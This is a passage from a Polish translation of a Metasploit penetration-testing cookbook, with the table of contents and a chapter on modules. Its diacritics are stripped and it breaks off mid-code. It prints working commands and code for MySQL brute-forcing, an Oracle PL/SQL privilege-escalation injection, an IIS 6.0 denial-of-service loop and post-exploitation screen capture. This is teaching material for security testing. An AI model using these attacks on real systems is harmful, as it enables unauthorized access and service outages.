tytuł oryginału: metasploit penetration testing cookbook ...metasploit. receptury pentestera 122...

Tytuł oryginału: Metasploit Penetration Testing Cookbook, Second Edition

Tłumaczenie: Lech Lachowski

ISBN: 978-83-246-9131-9

Copyright © Packt Publishing 2013.

First published in the English language under the title „Metasploit Penetration Testing Cookbook, Second Edition”.

Polish edition copyright © 2014 by Helion S.A. All rights reserved.

All rights reserved. No part of this book may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording or by any information storage retrieval system, without permission from the Publisher.

Wszelkie prawa zastrzeżone. Nieautoryzowane rozpowszechnianie całości lub fragmentu niniejszej publikacji w jakiejkolwiek postaci jest zabronione. Wykonywanie kopii metodą kserograficzną, fotograficzną, a także kopiowanie książki na nośniku filmowym, magnetycznym lub innym powoduje naruszenie praw autorskich niniejszej publikacji.

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli.

Autor oraz Wydawnictwo HELION dołożyli wszelkich starań, by zawarte w tej książce informacje były kompletne i rzetelne. Nie biorą jednak żadnej odpowiedzialności ani za ich wykorzystanie, ani za związane z tym ewentualne naruszenie praw patentowych lub autorskich. Autor oraz Wydawnictwo HELION nie ponoszą również żadnej odpowiedzialności za ewentualne szkody wynikłe z wykorzystania informacji zawartych w książce.

Wydawnictwo HELIONul. Kościuszki 1c, 44-100 GLIWICEtel. 32 231 22 19, 32 230 98 63e-mail: [email protected]: http://helion.pl (księgarnia internetowa, katalog książek)

Drogi Czytelniku!Jeżeli chcesz ocenić tę książkę, zajrzyj pod adres http://helion.pl/user/opinie/metarpMożesz tam wpisać swoje uwagi, spostrzeżenia, recenzję.

Printed in Poland.

• Kup książkę• Poleć książkę • Oceń książkę

• Księgarnia internetowa• Lubię to! » Nasza społeczność

http://helion.pl/rt/metarp

http://helion.pl/rf/metarp

http://helion.pl/ro/metarp

http://helion.pl

http://ebookpoint.pl/r/4CAKF

Spis tre ci

O autorze 7

O recenzentach 9

Przedmowa 11

Jaka jest zawarto tej ksi ki 12Czego potrzebujesz do pracy z t ksi k 13Dla kogo przeznaczona jest ta ksi ka 13Konwencje stosowane w tej ksi ce 14Pobieranie przyk adów kodu 14Errata 14Naruszenie praw autorskich 15

Rozdzia 1. Metasploit — szybkie porady dla profesjonalistów z bran y zabezpiecze 17

Wprowadzenie 17Konfiguracja Metasploit w systemie Windows 21Konfiguracja Metasploit w systemie Ubuntu 23Instalowanie Metasploit z systemem BackTrack 5 R3 26Przygotowywanie testów penetracyjnych przy wykorzystaniu aplikacji VMware 29Konfiguracja Metasploit na maszynie wirtualnej z po czeniem SSH 31Instalacja i konfiguracja bazy danych PostgreSQL w systemie BackTrack 5 R3 33Wykorzystanie bazy danych do przechowywania rezultatów testów penetracyjnych 36Korzystanie z frameworku BBQSQL 37

Rozdzia 2. Zbieranie informacji oraz skanowanie 41

Wprowadzenie 41Pasywne zbieranie informacji 44Skanowanie portów za pomoc narz dzia Nmap 47Skanowanie portów za pomoc narz dzia DNmap 52Skanowanie po wiadcze SMB za pomoc narz dzia keimpx 56Skanowanie wersji SSH 59

Kup książkę Poleć książkę



Spis tre ci

4

Skanowanie FTP 62Zamiatanie SNMP 63Skanowanie luk w zabezpieczeniach za pomoc narz dzia Nessus 65Skanowanie za pomoc narz dzia NeXpose 68Skanowanie luk w zabezpieczeniach za pomoc narz dzia OpenVAS 70

Rozdzia 3. Ocena podatno ci na ataki na podstawie systemu operacyjnego 75

Wprowadzenie 75Testy penetracyjne maszyny docelowej z systemem Windows XP SP2 78Uzyskiwanie zdalnego dost pu poprzez wi zanie pow oki na maszynie docelowej 83Testy penetracyjne systemu Windows 8 85Eksploatacja maszyny docelowej z systemem Linux (Ubuntu) 88Wstrzykiwanie bibliotek DLL w systemie Windows 92

Rozdzia 4. Eksploatacja typu client-side oraz omijanie ochrony antywirusowej 97

Wprowadzenie 98Luka execCommand Use-After-Free w zabezpieczeniach przegl darki Internet Explorer 99Luka Adobe Flash Player „new function”

zwi zana z wyj tkiem niew a ciwego u ycia wska nika 102Przepe nienie stosu bufora formatu RTF aplikacji Microsoft Word 104Uszkodzenie pami ci przy obs udze formatu U3D w aplikacji Adobe Reader 106Generowanie pliku binarnego oraz kodu pow oki za pomoc narz dzia msfpayload 108Schematy kodowania za pomoc narz dzia msfencoding oraz wspó czynnik wykrycia 111Zastosowanie skryptu killav.rb do wy czania ochrony antywirusowej 113Wy czanie us ug programów antywirusowych z poziomu wiersza polece 116Korzystanie z narz dzia strzykawki 118

Rozdzia 5. Praca z modu ami podczas testów penetracyjnych 121

Wprowadzenie 121Praca z modu ami pomocniczymi skanera 122Praca z administracyjnymi modu ami pomocniczymi 125Modu y wstrzykni cia zapytania SQL oraz ataku DoS 127Modu y fazy poeksploatacyjnej 130Podstawy budowy modu u 131Analiza gotowego modu u 133Budowanie w asnego modu u fazy poeksploatacyjnej 136

Rozdzia 6. Exploity 141

Wprowadzenie 141Struktura modu u 143Korzystanie z narz dzia msfvenom 146Konwertowanie exploita na modu frameworku Metasploit 147Importowanie i testowanie nowego modu u exploita 152Fuzzowanie aplikacji za pomoc Metasploit 153Budowanie prostego fuzzera serwera FTP FileZilla 156




Spis tre ci

5

Rozdzia 7. Testy penetracyjne w sieci VoIP 161

Wprowadzenie 161Faza skanowania i enumeracji 164Pozyskiwanie hase 168Przeskakiwanie VLAN-ów 169Podszywanie si pod adresy MAC w sieci VoIP 171Atak wykorzystuj cy podszywanie si pod inn osob 173Atak DoS 175

Rozdzia 8. Testy penetracyjne sieci bezprzewodowej 179

Wprowadzenie 179Konfigurowanie i uruchamianie narz dzia Fern WiFi Cracker 180Monitorowanie interfejsów sieciowych za pomoc narz dzia tcpdump 182amanie zabezpiecze szyfrowania WEP oraz WPA za pomoc aplikacji Fern Wi-Fi Cracker 187

Przechwytywanie sesji przy u yciu adresu MAC 191Okre lanie geolokalizacji celu 194Technika wardrivingu 194Atak typu z y bli niak 198Konfiguracja Karmetasploit 201

Rozdzia 9. Pakiet narz dzi socjotechnicznych — Social Engineer-Toolkit 205

Wprowadzenie 205Wprowadzenie do pakietu SET 206Praca z plikiem konfiguracyjnym pakietu SET 208Praca z wektorami ataku spear-phishing 212Wektory ataku WWW 215Praca z wektorem ataku wieloaspektowego 218Generator zainfekowanych no ników danych 219

Rozdzia 10. Korzystanie z Meterpretera 223

Wprowadzenie 224Polecenia systemowe Meterpretera 225Polecenia systemu plików Meterpretera 227Polecenia sieciowe Meterpretera 229Poszerzanie uprawnie i migracja procesu 232Konfiguracja wielu kana ów komunikacji z celem 234Zacieranie ladów za pomoc polecenia timestomp 237Polecenie getdesktop oraz przechwytywanie uderze klawiatury 239Korzystanie ze skryptu scraper Meterpretera 243Technika pass the hash 245Ustanawianie trwa ego po czenia za pomoc backdoorów 247Pivoting z wykorzystaniem Meterpretera 250Przekierowanie portów za pomoc Meterpretera 252Interfejs API i domieszki Meterpretera 255Dodatek Railgun, czyli Ruby jako bro 259




Spis tre ci

6

Dodawanie bibliotek DLL oraz definicji funkcji do narz dzia Railgun 261Budowanie skryptu Meterpretera „Dezaktywator firewalla systemu Windows” 263Analizowanie wbudowanego skryptu Meterpretera 266Zdalne wstrzykiwanie serwera VNC 271Eksploatowanie podatnej na ataki aplikacji PHP 274Atak Incognito z wykorzystaniem Meterpretera 276

Dodatek A. Testy penetracyjne w chmurze 281

Wprowadzenie 281Testy penetracyjne w chmurze 285Pentesting w chmurze z wykorzystaniem serwisu hackaserver.com 286

Skorowidz 291




5

Praca z modu amipodczas testówpenetracyjnych

W tym rozdziale: Praca z modu ami pomocniczymi skanera Praca z administracyjnymi modu ami pomocniczymi Modu y wstrzykni cia zapytania SQL oraz ataku DoS Modu y fazy poeksploatacyjnej Podstawy budowy modu u Analiza gotowego modu u Budowanie w asnego modu u fazy poeksploatacyjnej

WprowadzenieW pierwszym rozdziale omówili my podstawy frameworku Metasploit i stwierdzili my, e ma ar-chitektur modu ow . Oznacza to, e wszystkie exploity, adunki, kodery oraz inne jego kom-ponenty maj posta modu ów. Modu owa architektura u atwia rozszerzanie funkcjonalno ciframeworku. Ka dy programista mo e opracowa swój w asny modu i zaimportowa go doframeworku. Pe ny proces testów penetracyjnych mo e wymaga uruchomienia kilku modu-ów. Kiedy rozpoczynamy np. faz eksploatacji, u ywamy modu u adunku, a gdy ju z amiemy

zabezpieczenia maszyny docelowej, mo emy skorzysta z kilku modu ów poeksploatacyjnych.




Metasploit. Receptury pentestera

122

Ró ne modu y znajd tak e zastosowanie przy czeniu si z baz danych oraz zapisywaniu w niejwyników przeprowadzanych testów. Mimo e modu y nie s omawiane zbyt szeroko podczaspracy z frameworkiem Metasploit, to stanowi jego istot , wi c powiniene dobrze poznasposób ich funkcjonowania.

W tym rozdziale skoncentrujemy si na folderze opt/metasploit/msf3/modules, zawieraj cympe n list u ytecznych modu ów, które mog u atwi zadanie przeprowadzania testów pene-tracyjnych. Stosowanie modu ów jest bardzo podobne do tego, co omawiali my do tej pory,ale istnieje pewna ró nica w ich funkcjonalno ci. W dalszej cz ci rozdzia u przeanalizujemyte niektóre z istniej cych modu ów, a na koniec zajmiemy si tworzeniem w asnych modu-ów dla frameworku Metasploit. Rozpocznijmy eksperymenty z modu ami.

Praca z modu ami pomocniczymi skaneraZacznijmy eksperymentowanie od zapoznania si z modu ami skanera. Poznali my szczegó-owo proces skanowania, stosuj c narz dzie nmap. W tej recepturze przeanalizujemy niektóre

z gotowych modu ów skanuj cych, które s dostarczane wraz z frameworkiem Metasploit.Cho nmap jest wszechstronnym narz dziem skanuj cym, mo e si zdarzy , e b dziemy mu-sieli wykona skanowanie konkretnego typu, takie jak skanowanie pod k tem obecno ci bazydanych MySQL.

Metasploit dostarcza pe n list takich u ytecznych skanerów. Spróbujmy zastosowa jew praktyce.

Przygotuj siList dost pnych skanerów znajdziesz w folderze /opt/metasploit/msf3/modules/auxiliary/scanner.

Ta lista obejmuje ponad 35 ró nych modu ów skanowania, które mog by stosowane w ró -nych scenariuszach testów penetracyjnych.

Jak to wykonaNauczmy si krok po kroku, jak pracowa z pomocniczymi modu ami skanerów. Zaczniemyod podstawowego skanera HTTP. Przekonasz si , e jest dost pnych wiele ró nych opcji ska-nowania HTTP. Poni ej omówimy kilka z nich:

Przyjrzyjmy si skryptowi dir_scanner. Przeprowadza on skanowanie pojedynczegohosta lub ca ego zakresu sieci w poszukiwaniu interesuj cych list folderów,które mog zosta poddane dalszemu badaniu, by zebra informacje o celu.




Rozdzia 5. • Praca z modu ami podczas testów penetracyjnych

123

Aby rozpocz korzystanie z modu u pomocniczego, musimy wpisa w konsolimsfconsole nast puj ce polecenia:msf > use auxiliary/scanner/http/dir_scannermsf auxiliary(dir_scanner) > show options

Polecenie show options wy wietli list wszystkich dost pnych opcjonalnych parametrów, któ-re mo na zastosowa dla modu u skanera. Najwa niejszym z nich jest parametr RHOSTS, którypozwala wskaza pojedyncz maszyn lub grup komputerów w danej sieci.

Jak to dzia aOmówmy konkretny modu skanera wraz z dodatkowymi danymi wej ciowymi. Modu skane-ra mysql_login jest modu em ataków si owych (ang. brute force), który skanuje dost pnoserwera MySQL na maszynie docelowej i próbuje zalogowa si do bazy danych poprzez atakmetod brute force w sposób nast puj cy:

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true yes Try blank pas... BRUTEFORCE_SPEED 5 yes How fast to... PASSWORD no A specific password... PASS_FILE no File containing... RHOSTS yes The target address... RPORT 3306 yes The target port... STOP_ON_SUCCESS false yes Stop guessing... THREADS 1 yes The number of... USERNAME no A specific user... USERPASS_FILE no File containing... USER_FILE no File containing... VERBOSE true yes Whether to print...

Jak widzisz, istnieje wiele ró nych parametrów, które mo emy ustawi dla tego modu u. Imlepiej wykorzystamy mo liwo ci modu u, tym wi ksze s szanse na przeprowadzenie udanychtestów penetracyjnych. Mo emy dostarczy pe n list nazw u ytkowników oraz hase , któremodu mo e wykorzysta do próby zalogowania si na maszynie docelowej.

Dostarczmy te informacje do modu u:

msf auxiliary(mysql_login) > set USER_FILE /nazwy_uzytkownikow.txtUSER_FILE => /nazwy_uzytkownikow.txtmsf auxiliary(mysql_login) > set PASS_FILE /hasla.txtPASS_FILE => /hasla.txt





124

Jeste my gotowi, aby zastosowa metod ataku si owego. Ostatnim krokiem jest wybraniecelu i wykonanie polecenia run, aby uruchomi modu :

msf auxiliary(mysql_login) > set RHOSTS 192.168.56.101RHOSTS => 192.168.56.101msf auxiliary(mysql_login) > run[*] 192.168.56.101:3306 - Found remote MySQL version 5.0.51a[*] 192.168.56.101:3306 Trying username:'administrator' with password:''

Jak wida w powy szym listingu, modu rozpocz swoje dzia anie od próby znalezienia serweraMySQL na maszynie docelowej. Po stwierdzeniu obecno ci tego serwera modu przeprowa-dza sprawdzanie kombinacji nazw u ytkownika oraz hase dostarczonych w pliku zewn trznym.Przeprowadzana w tym scenariuszu operacja jest równie jedn z najcz ciej wykonywanychw Metasploit czynno ci z wykorzystaniem modu ów. Dost pnych jest wiele zautomatyzowa-nych modu ów ataków si owych, które s u do amania s abych hase .

Zobacz równieOmówmy szybki i prosty sposób generowania plików hase za pomoc frameworku Metasploit.Poka na lista hase mo e by pomocna podczas testów penetracyjnych metod brute force.

Generowanie hase za pomoc narz dzia CrunchPrzy ka dym ataku si owym konieczne jest posiadanie obszernej listy hase , które wykorzystamydo prób logowania. Listy hase mo na pobra z zasobów internetowych. Pentester mo e tewygenerowa list hase za pomoc narz dzia John the Ripper lub skorzysta z wbudowanegow system BackTrack narz dzia crunch, aby utworzy tak list na podstawie wskazanego ze-stawu znaków. Narz dzie crunch znajduje si w folderze /pentest/passwords/crunch. Je li gonie ma w Twojej wersji systemu BackTrack, mo esz je zainstalowa , wprowadzaj c w oknieterminala nast puj ce polecenie:

root@bt: cd /pentest/passwordsroot@bt:/pentest/passwords# apt-get install crunch

Przyk adowa sk adnia narz dzia crunch jest nast puj ca:

./crunch <d _min> <d _maks> [-f / cie ka/do_pliku/charset.lstnazwa_zestawu_znaków][-o lista_hase .txt][-t [niezmienny_ci g_znaków]@@@@][-s pocz tkowy_ci g_znaków][-c liczba_linii_pliku_tekstowego]

Poni ej opisano znaczenie niektórych u ytecznych parametrów narz dzia crunch: Parametr d _min okre la pocz tkow minimaln d ugo ci gu znaków. Parametr d _maks okre la ko cow maksymaln d ugo ci gu znaków. Parametr nazwa_zestawu_znaków okre la predefiniowany zestaw znaków,

który ma by wykorzystany do wygenerowania listy hase .





125

Parametr -b: liczba[kb/mb/gb] okre la rozmiar pliku wyj ciowego w wybranejjednostce (MB, KB lub GB).

Parametr -f </ cie ka/do_pliku/charset.lst> <nazwa_zestawu_znaków> pozwalaokre li predefiniowany zestaw znaków z pliku charset.lst (np. hex-lower).

Parametr -o <lista_hase .txt> okre la plik, w którym zostan zapisane danewyj ciowe.

Parametr -t [niezmienny_ci g_znaków]<@,%^> s u y do dodawania wwygenerowanym ha le niezmieniaj cego si ci gu znaków oraz dodatkowych,wyst puj cych w dowolnej liczbie, losowych, pojedynczych znaków o ustalonymformacie, którego poszczególne opcje oznaczaj : @ — ma e litery, , — wielkielitery, % — liczby, ^ — symbole. Przyk adowo, wygenerowane has o z opcj-t @@@helion@@@ mo e wygl da nast puj co bgrhelionoip.

Pe n dokumentacj narz dzia crunch mo na znale na stronie http://sourceforge.net/projects/crunch-wordlist/files/crunchwordlist/.

Mo esz przej do pe nej dokumentacji, aby dowiedzie si , w jaki sposób korzysta z tegonarz dzia do generowania listy d ugich i skomplikowanych hase .

Inne zasobyMo emy równie zastosowa listy hase pozyskane w wyniku przeprowadzonych przez osobytrzecie ataków na ró ne serwisy internetowe. Cenny zasób takich hase znajdziesz na stroniehttp://www.skullsecurity.org/wiki/index.php/Passwords.

Listy hase w systemie BackTrack zlokalizowane s w folderze /pentest/passwords/wordlists.W systemie Kali Linux ten zasób znajduje si w katalogu /usr/share/wordlists.

Praca z administracyjnymi modu amipomocniczymiKontynuuj c eksperymenty z modu ami, przejd my do modu ów administracyjnych, któremog by bardzo przydatne podczas testów penetracyjnych. Modu y administracyjne, w zale no-ci od ich funkcjonalno ci, mog s u y do ró nych celów, takich jak poszukiwanie panelu

administracyjnego, loginu administratora itd. W tej recepturze przyjrzymy si prostemu ad-ministracyjnemu modu owi pomocniczemu o nazwie mysql_enum.





126

Przygotuj siModu mysql_enum jest specjalnym modu em narz dziowym dla serwerów baz danych MySQL.Zapewnia prost enumeracj serwera baz danych MySQL, przy za o eniu e odpowiednie po-wiadczenia u ytkownika s przyznane dla po czenia zdalnego. Zobaczmy, jak to dzia a

w praktyce.

Jak to wykonaPoni sze kroki okre laj sposób pracy z administracyjnym modu em pomocniczym:

Zaczniemy od uruchomienia interfejsu konsoli msfconsole i wprowadzenia cie kidost pu do modu u pomocniczego:

msf > use auxiliary/admin/mysql/mysql_enum

msf auxiliary(mysql_enum) > show optionsModule options (auxiliary/admin/mysql/mysql_enum): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the... RHOST yes The target address RPORT 3306 yes The target port USERNAME no The username to...

Jak wida , modu pozwala na zdefiniowanie takich parametrów jak PASSWORD(has o), USERNAME (nazwa u ytkownika) oraz RHOST (adres zdalnego hosta). Mo eto by pomocne przy pierwszym wyszukiwaniu potencjalnej bazy danych MySQLoraz podczas próby zdalnego logowania za pomoc podanych po wiadcze .Przeanalizujmy dane wyj ciowe wy wietlone po wykonaniu komendy exploit:

msf auxiliary(mysql_enum) > exploit[*] Configuration Parameters:[*] C2 Audit Mode is Not Enabled[*] xp_cmdshell is Enabled[*] remote access is Enabled[*] allow updates is Not Enabled[*] Database Mail XPs is Not Enabled[*] Ole Automation Procedures are Not Enabled[*] Databases on the server:[*] Database name:master

Modu odpowiada du ilo ci przydatnych informacji. Informuje nas o tym, e pow oka cmdshelloraz zdalny dost p zosta y w czone w konfiguracji MySQL na maszynie docelowej. Zwracarównie informacj o nazwie bazy danych, która jest aktualnie uruchomiona na maszynie do-celowej.





127

Istnieje kilka podobnych modu ów przeznaczonych dla innych us ug, takich jak MSSQL i Apache.Dla wi kszo ci modu ów sposób dzia ania jest zbli ony. Pami taj, aby u y polecenia show optionsw celu sprawdzenia, które parametry s wymagane.

Jak to dzia aAdministracyjne modu y pomocnicze wykorzystuj prosty proces enumeracji, uruchamiaj cpo czenie, a nast pnie wypróbowuj c ró ne kombinacje nazw u ytkownika i hase . Za po-moc tych modu ów mo na równie sprawdzi , czy serwer bazy danych umo liwia anonimo-we logowanie. Ponadto mo na wykona prób logowania dla domy lnych po wiadcze . Dlaserwera MySQL domy lne po wiadczenia to nazwa u ytkownika scott oraz has o tiger.

Modu y wstrzykni cia zapytania SQLoraz ataku DoSFramework Metasploit jest przyjazny zarówno dla pentesterów, jak i hakerów. Jest tak dlatego, epentester musi my le z perspektywy hakera, aby zabezpieczy swoj sie , us ugi, aplikacje itd.Modu y wstrzykni cia zapytania SQL (ang. SQL injection — SQLi) oraz ataków typu DoS (ang.Denial of Service) pomagaj pentesterom w atakowaniu w asnych us ug w celu sprawdzenia,czy s one podatne na takie ataki. Warto wi c szczegó owo omówi niektóre z tych modu ów.

Przygotuj siModu wstrzykni cia SQL wykorzystuje znan luk w zabezpieczeniach okre lonego typu ba-zy danych, umo liwiaj c jej eksploatacj i zapewniaj c nieautoryzowany dost p. Wiadomo, e taluka dotyczy baz danych Oracle 9i oraz 10g. Metasploit zawiera kilka modu ów, które wyko-rzystuj znany exploit baz danych Oracle w celu z amania ich zabezpiecze poprzez wstrzyk-ni cie zapytania. Modu y mo na znale w folderze modules/auxiliary/sqli/oracle.

Jak to wykonaPrzeanalizujmy luk w zabezpieczeniach, która nosi nazw Oracle DBMS_METADATA XML:

Ta luka zwi ksza uprawnienia u ytkownika DB_USER do poziomu administratorabazy danych DB_ADMINISTRATOR. Wykorzystamy modu dbms_metadata_get_xml:

msf auxiliary(dbms_metadata_get_xml) > show options

Module options (auxiliary/sqli/oracle/dbms_metadata_get_xml): Name Current Setting Required Description ---- --------------- -------- -----------





128

DBPASS TIGER yes The password to... DBUSER SCOTT yes The username to... RHOST yes The Oracle host. RPORT 1521 yes The TNS port. SID ORCL yes The sid to authenticate. SQL GRANT DBA to SCOTT no SQL to execute.

Modu wymaga okre lenia podobnych parametrów, jakie stosowali my do tej pory.Najpierw wykonywana jest próba zalogowania si za pomoc domy lnychpo wiadcze , czyli odpowiednio nazwy u ytkownika scott oraz has a tiger.Gdy modu uzyskuje status zalogowania jako u ytkownik bazy danych, wykonujeexploit w celu zwi kszenia uprawnie do poziomu administratora bazy danych.Uruchommy modu w celu przetestowania maszyny docelowej:

msf auxiliary(dbms_metadata_get_xml) > set RHOST 192.168.56.1msf auxiliary(dbms_metadata_get_xml) > set SQL YES

msf auxiliary(dbms_metadata_get_xml) > run

Po pomy lnym wykonaniu modu u uprawnienia u ytkownika zostan zwi kszonez DB_USER do DB_ADMINISTRATOR.Kolejnym modu em, który omówimy, jest modu zwi zany z atakami typu DoS(ang. Denial of Service). Przeanalizujemy prost luk w zabezpieczeniach us ug IIS(ang. Internet Information Services) w wersji 6.0, która umo liwia atakuj cemudoprowadzenie do awarii serwera przez wys anie dania POST, zawieraj cegoponad 40000 parametrów dania. Zajmijmy si t luk pokrótce. Modu zostaprzetestowany na serwerze z niezaktualizowan wersj systemu Windows 2003z uruchomionymi us ugami IIS w wersji 6.0. Modu u ms10_065_ii6_asp_dosu yjemy w sposób nast puj cy:

msf > use auxiliary/dos/windows/http/ms10_065_ii6_asp_dos

msf auxiliary(ms10_065_ii6_asp_dos) > show options

Module options (auxiliary/dos/windows/http/ms10_065_ii6_asp_dos): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 80 yes The target port URI /page.asp yes URI to request VHOST no The virtual host name to...msf auxiliary(ms10_065_ii6_asp_dos) > set RHOST 192.168.56.1RHOST => 192.168.56.1msf auxiliary(ms10_065_ii6_asp_dos) > run[*] Attacking http://192.168.56.1:80/page.asp

Gdy modu zostanie uruchomiony za pomoc polecenia run, zaczyna atakowadocelowy serwer IIS poprzez wys anie dania HTTP na porcie 80 z adresem URLdo strony page.asp. Pomy lne wykonanie modu u doprowadzi do ca kowitejodmowy us ugi (DoS) na serwerze IIS.





129

Jak to dzia aRzu my okiem na dwie luki w zabezpieczeniach. Luka bazy danych firmy Oracle jest eksplo-atowana za pomoc wstrzykiwania niestandardowej funkcji PL/SQL, która jest wykonywanaw kontek cie SYS i zwi ksza uprawnienia u ytkownika scott do uprawnie administratora.Rozwa my t przyk adow funkcj :

CREATE OR REPLACE FUNCTION "SCOTT"."ATTACK_FUNC" return varchar2authid current_user aspragma autonomous_transaction;BEGINEXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';COMMIT;RETURN '';END;/

Wstrzykiwanie tej funkcji w podatnej na ataki procedurze doprowadzi do zwi kszenia upraw-nie dla u ytkownika scott:

SELECT SYS.DBMS_METADATA.GET_DDL('''||SCOTT.ATTACK_FUNC()||''','') FROM dual;

Powy szy wiersz kodu wyja nia proces wstrzykni cia. Szczegó owa analiza luki w zabezpie-czeniach oprogramowania firmy Oracle wykracza poza zakres tej ksi ki.

Przejd my do modu u ataków DoS, który wykorzystuje luk w zabezpieczeniach serwera IISw wersji 6.0. Atakuj cy wysy a danie POST, które zawiera ponad 40000 parametrów dania.

danie ma posta kodowania typu application/x-www-form-urlencoded.

Oto cz skryptu, która obs uguje ten modu :

while(1) begin connect payload = "C=A&" * 40000 length = payload.size sploit = "HEAD #{datastore['URI']} HTTP/1.1\r\n" sploit << "Host: #{datastore['VHOST'] || rhost}\r\n" sploit << "Connection:Close\r\n" sploit << "Content-Type: application/x-www-formurlencoded\r\n" sploit << "Content-Length:#{length} \r\n\r\n" sploit << payload sock.put(sploit) #print_status("DoS packet sent.") disconnect rescue Errno::ECONNRESET next endend





130

Jak wida powy ej, skrypt generuje adunek o rozmiarze wi kszym ni 40000. Nast pnie nawi -zywane jest po czenie na porcie 80 w celu wys ania dania HTTP do serwera IIS. Po prze-tworzeniu dania przez serwer nast pi awaria i zatrzymanie pracy do momentu ponownegouruchomienia serwera.

Modu y fazy poeksploatacyjnejDotychczas omawiali my g ównie dzia ania fazy poeksploatacyjnej przeprowadzane za pomo-c ró nych funkcji Meterpretera. Mamy te jednak do dyspozycji osobn dedykowan listmodu ów, które mog poszerzy do wiadczenie wykonywania testów penetracyjnych. Ponie-wa s to modu y fazy poeksploatacyjnej, b dziemy potrzebowali aktywnej sesji na maszyniedocelowej. W tej recepturze postaramy si uzyska dost p do celu.

Przygotuj siModu fazy poeksploatacyjnej to zbiór jednych z najbardziej interesuj cych i przydatnych funkcji,które mo na wykorzysta podczas testów penetracyjnych. Przeanalizujmy szybko niektóre z nich.U yjemy jako maszyny docelowej niezaktualizowanego systemu Windows 7 z aktywn sesjMeterpretera.

Jak to wykonaPrzejd my do fazy poeksploatacyjnej, w której wykonamy nast puj ce czynno ci:

1. Modu y fazy poeksploatacyjnej znajduj si w folderze modules/post/windows/gather.Zacznijmy od prostego modu u enum_logged_on_users, który wy wietli listaktualnie zalogowanych u ytkowników na maszynie z systemem Windows.Uruchomimy ten modu poprzez aktywn sesj Meterpretera. Pami taj równie ,aby zwi kszy uprawnienia u ytkownika za pomoc polecenia getsystem w celuunikni cia jakichkolwiek b dów w trakcie uruchamiania modu u:

meterpreter > getsystem...got system (via technique 4).meterpreter > run post/windows/gather/enum_logged_on_users[*] Running against session 1Current Logged Users==================== SID User --- ---- S-1-5-21-2350281388-457184790-407941598 DARKLORD-PC\DARKLORDRecently Logged Users===================== SID Profile Path





131

--- ------------ S-1-5-18 %systemroot%\system32\config\systemprofile S-1-5-19 C:\Windows\ServiceProfiles\LocalService S-1-5-20 C:\Windows\ServiceProfiles\NetworkService S-1-5-21-23502 C:\Users\DARKLORD S-1-5-21-235 C:\Users\Winuser

Pomy lne uruchomienie modu u powoduje wy wietlenie dwóch tabel. Pierwszaz nich zawiera list aktualnie zalogowanych u ytkowników, a druga informacjeo ostatnio zalogowanych u ytkownikach. Prze led odpowiedni cie k podczasuruchamiania modu ów. Do ich uruchomienia u yli my polecenia run. Poniewawszystkie s skryptami j zyka Ruby, Meterpreter mo e je atwo zidentyfikowa .

2. Przeanalizujmy jeszcze jeden przyk ad. Istnieje pewien interesuj cy modu fazypoeksploatacyjnej, który przechwytuje zrzut ekranu pulpitu maszyny docelowej.Modu ten mo e by przydatny, gdy musimy si dowiedzie , czy istniejejakikolwiek aktywny u ytkownik, czy nie. Jest to nast puj cy modu :

meterpreter > run post/windows/gather/screen_spy[*] Migrating to explorer.exe pid: 1104[*] Migration successful[*] Capturing 60 screenshots with a delay of 5 seconds

Mo esz zauwa y , jak atwe w u yciu i przydatne mog by modu y fazy poeksploatacyjnej.W najbli szej przysz o ci twórcy frameworku Metasploit b d skupia si raczej na modu achfazy poeksploatacyjnej, a nie na Meterpreterze, poniewa znacznie zwi kszaj one funkcjonalnotestów penetracyjnych. Je li wi c szukasz sposobno ci, aby wspomóc spo eczno Metasploit,mo esz popracowa nad modu ami fazy poeksploatacyjnej.

Jak to dzia aPrzeanalizuj skrypty enum_logged_on_user.rb oraz screen_spy.rb z folderu modules/post/windows/gather. Mo e pomóc Ci to lepiej zrozumie sposób funkcjonowania tych modu ów.

Podstawy budowy modu uJak dot d omówili my przydatno modu ów i potencja , jaki mog doda do frameworkuMetasploit. Aby biegle opanowa korzystanie z tego frameworku, konieczne jest zrozumieniefunkcjonowania i budowy modu ów. Pomo e to w szybkim rozszerzeniu mo liwo ci frame-worku zgodnie z naszymi potrzebami. W kilku kolejnych recepturach zobaczymy, w jaki spo-sób mo emy u ywa skryptów Ruby do budowania w asnych modu ów i importowa je doframeworku.





132

Przygotuj siAby rozpocz budow w asnego modu u, potrzebujemy podstawowej znajomo ci skryptówRuby. Omówili my ju wykorzystanie i implementacj j zyka programowania Ruby przy pi-saniu skryptów Meterpretera. W tej recepturze zobaczymy, jak pos u y si j zykiem Rubyprzy tworzeniu nowych modu ów dla frameworku. Proces ten jest bardzo podobny do pisaniaskryptów Meterpretera. Ró nica polega na zastosowaniu zestawu uprzednio zdefiniowanychwierszy kodu, które s niezb dne, aby framework móg zrozumie wymagania i natur mo-du u. Omówmy wi c niektóre z zasadniczych wymaga , które musz by spe nione przy bu-dowie modu ów.

Jak to wykonaZacznijmy od podstaw tworzenia modu ów:

Aby modu by czytelny dla frameworku, musimy zaimportowa biblioteki MSFw sposób nast puj cy:

require 'msf/core'

Jest to pierwszy i najwa niejszy wiersz kodu ka dego skryptu. Wskazuje, e modub dzie zawiera wszystkie zale no ci i funkcjonalno ci frameworku Metasploit.

Kolejny wiersz definiuje klas , która dziedziczy w a ciwo ci rodziny modu ówpomocniczych. Modu pomocniczy mo e importowa kilka funkcjonalno ci, takichjak skanowanie, otwieranie po cze , korzystanie z bazy danych itd.:

class Metasploit3 < Msf::Auxiliary

Instrukcja include mo e by wykorzystana w celu dodania do tworzonego modu ukonkretnej funkcjonalno ci frameworku. Je eli budujesz np. modu skanera,mo esz zastosowa instrukcj :

include Msf::

Nast puj cy wiersz doda do modu u funkcjonalno zdalnego skanowania TCP:

include Msf::Exploit::Remote::TCP

Poni szy fragment kodu importuje g ówne biblioteki modu u skanowaniaz bibliotek frameworku Metasploit:

include Msf::Exploit::Remote::TCP include Msf::Exploit::Capture include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report

Kolejny fragment skryptu stanowi wprowadzenie do modu u, dostarczaj cinformacje takie jak jego nazwa, wersja, autor, opis itd.:

def initialize super(





133

